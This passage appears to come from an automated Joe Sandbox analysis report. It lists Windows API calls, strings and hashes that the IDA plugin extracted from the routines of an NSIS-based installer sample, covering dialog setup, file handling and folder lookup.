                                                                                                                  • lstrcmpiW.KERNEL32(004281D8,.exe,004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
                                                                                                                  • GetFileAttributesW.KERNEL32(004281E0), ref: 00403BF7
                                                                                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403C40
                                                                                                                    • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                                  • RegisterClassW.USER32(004291E0), ref: 00403C7D
                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
                                                                                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
                                                                                                                  • RegisterClassW.USER32(004291E0), ref: 00403D42
                                                                                                                  • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                  • String ID: (7B$.DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                  • API String ID: 1975747703-1425696872
                                                                                                                  • Opcode ID: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
                                                                                                                  • Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
                                                                                                                  • Opcode Fuzzy Hash: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
                                                                                                                  • Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D
                                                                                                                  APIs
                                                                                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 004045D0
                                                                                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
                                                                                                                  • GetSysColor.USER32(?), ref: 004045FE
                                                                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                                                                                  • lstrlenW.KERNEL32(?), ref: 0040461F
                                                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                                                                                  • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                                                                                  • SendMessageW.USER32(00000000), ref: 004046A1
                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 004046CC
                                                                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                                                                                  • SetCursor.USER32(00000000), ref: 00404720
                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                                                                                  • SetCursor.USER32(00000000), ref: 0040473C
                                                                                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
                                                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                  • String ID: N
                                                                                                                  • API String ID: 3103080414-1130791706
                                                                                                                  • Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                                  • Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
                                                                                                                  • Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                                  • Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
                                                                                                                  APIs
                                                                                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                  • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                  • String ID: F
                                                                                                                  • API String ID: 941294808-1304234792
                                                                                                                  • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                                  • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                                                                                  • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                                  • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                                                                                  • lstrcmpiW.KERNEL32(004281E0,00423728,00000000,?,?), ref: 004049B7
                                                                                                                  • lstrcatW.KERNEL32(?,004281E0), ref: 004049C3
                                                                                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                                                                                    • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45
                                                                                                                    • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,76233420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                                    • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                                    • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,76233420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                                    • Part of subcall function 0040667C: CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,76233420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A98
                                                                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                                                                                    • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                                    • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                                                                                    • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                  • String ID: (7B$A
                                                                                                                  • API String ID: 2624150263-3645020878
                                                                                                                  • Opcode ID: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
                                                                                                                  • Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
                                                                                                                  • Opcode Fuzzy Hash: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
                                                                                                                  • Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D
                                                                                                                  APIs
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                                                                                  • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
                                                                                                                    • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                                    • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                                  • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
                                                                                                                  • wsprintfA.USER32 ref: 004060B3
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
                                                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
                                                                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                                                                                                  • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                                                                                    • Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
                                                                                                                    • Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                  • String ID: %ls=%ls$[Rename]
                                                                                                                  • API String ID: 2171350718-461813615
                                                                                                                  • Opcode ID: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
                                                                                                                  • Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
                                                                                                                  • Opcode Fuzzy Hash: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
                                                                                                                  • Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
                                                                                                                  APIs
                                                                                                                  • GetTickCount.KERNEL32 ref: 00402F44
                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400), ref: 00402F60
                                                                                                                    • Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
                                                                                                                    • Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,00000003), ref: 00402FA9
                                                                                                                  • GlobalAlloc.KERNEL32(00000040,0040A230), ref: 004030F0
                                                                                                                  Strings
                                                                                                                  • Error launching installer, xrefs: 00402F80
                                                                                                                  • soft, xrefs: 00403020
                                                                                                                  • Null, xrefs: 00403029
                                                                                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403187
                                                                                                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403139
                                                                                                                  • Inst, xrefs: 00403017
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                  • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                  • API String ID: 2803837635-787788815
                                                                                                                  • Opcode ID: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
                                                                                                                  • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                                                                                                  • Opcode Fuzzy Hash: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
                                                                                                                  • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD
                                                                                                                  APIs
                                                                                                                  • GetSystemDirectoryW.KERNEL32(004281E0,00000400), ref: 0040654B
                                                                                                                  • GetWindowsDirectoryW.KERNEL32(004281E0,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
                                                                                                                  • SHGetPathFromIDListW.SHELL32(00000000,004281E0), ref: 004065A8
                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                                                                                  • lstrcatW.KERNEL32(004281E0,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                                                                                  • lstrlenW.KERNEL32(004281E0,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631
                                                                                                                  Strings
                                                                                                                  • Software\Microsoft\Windows\CurrentVersion, xrefs: 0040651B
                                                                                                                  • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004065D3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                  • API String ID: 717251189-730719616
                                                                                                                  • Opcode ID: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
                                                                                                                  • Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
                                                                                                                  • Opcode Fuzzy Hash: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
                                                                                                                  • Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D
                                                                                                                  APIs
                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                                                                                  • GetSysColor.USER32(00000000), ref: 00404421
                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                                                                                  • SetBkMode.GDI32(?,?), ref: 00404439
                                                                                                                  • GetSysColor.USER32(?), ref: 0040444C
                                                                                                                  • SetBkColor.GDI32(?,?), ref: 0040445C
                                                                                                                  • DeleteObject.GDI32(?), ref: 00404476
                                                                                                                  • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2320649405-0
                                                                                                                  • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                  • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                                                                                  • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                  • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                                                                                  APIs
                                                                                                                  • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                                    • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5
                                                                                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                  • String ID: 9
                                                                                                                  • API String ID: 163830602-2366072709
                                                                                                                  • Opcode ID: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
                                                                                                                  • Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
                                                                                                                  • Opcode Fuzzy Hash: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
                                                                                                                  • Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59
                                                                                                                  APIs
                                                                                                                  • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                  • lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                  • lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                                  • SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2531174081-0
                                                                                                                  • Opcode ID: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
                                                                                                                  • Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
                                                                                                                  • Opcode Fuzzy Hash: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
                                                                                                                  • Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8
                                                                                                                  APIs
                                                                                                                  • DestroyWindow.USER32(?,00000000), ref: 00402EA9
                                                                                                                  • GetTickCount.KERNEL32 ref: 00402EC7
                                                                                                                  • wsprintfW.USER32 ref: 00402EF5
                                                                                                                    • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                    • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                    • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                                    • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                    • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                    • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                    • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                                                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                                                                                    • Part of subcall function 00402E72: MulDiv.KERNEL32(?,00000064,?), ref: 00402E87
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                  • String ID: ... %d%%
                                                                                                                  • API String ID: 722711167-2449383134
